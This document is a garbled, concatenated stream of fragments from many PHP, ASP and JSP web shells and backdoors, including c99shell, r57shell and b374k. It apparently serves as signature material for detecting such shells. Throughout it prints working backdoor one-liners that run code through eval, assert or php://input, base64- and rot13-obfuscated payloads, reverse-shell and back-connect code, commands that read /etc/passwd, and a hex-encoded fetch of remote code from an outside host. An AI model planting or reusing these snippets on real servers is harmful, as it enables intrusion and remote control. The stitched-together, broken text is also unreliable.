directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst 